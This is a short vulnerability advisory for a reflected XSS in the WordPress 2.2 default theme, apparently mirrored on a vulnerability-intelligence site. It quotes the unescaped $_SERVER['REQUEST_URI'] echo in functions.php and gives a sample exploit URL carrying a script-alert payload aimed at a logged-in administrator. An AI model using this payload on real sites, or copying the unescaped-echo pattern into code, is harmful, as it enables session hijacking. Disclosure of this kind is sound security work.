Lucene search

K

wordpresstheme-xss.txt

🗓️ 11 Jun 2007 00:00:00Reported by John SmithType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 21 Views

There's an XSS in the Wordpress default theme, version 2.2, in functions.php at line 387

Show more

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`There is an XSS in the Wordpress default theme. Tested on WordPress version 2.2  
  
Filename functions.php, line 387.  
Code:  
  
<form style="display: inline" method="post" name="hicolor"  
id="hicolor" action="<?php echo $_SERVER['REQUEST_URI']; ?>">  
  
$_SERVER['REQUEST_URI'] is directly echoed to the user.  
  
This problem can be exploited if the adminstrator is logged in.  
  
Sample exploit URL.  
http://www.example.com/wp-admin/themes.php?page=functions.php&zmx"><script>alert(1)</script>  
  
There are other XSS vulnerabilities in popular Wordpress themes.  
More details on http://www.xssnews.com/  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
11 Jun 2007 00:00Current
7.4High risk
Vulners AI Score7.4
21
.json
Report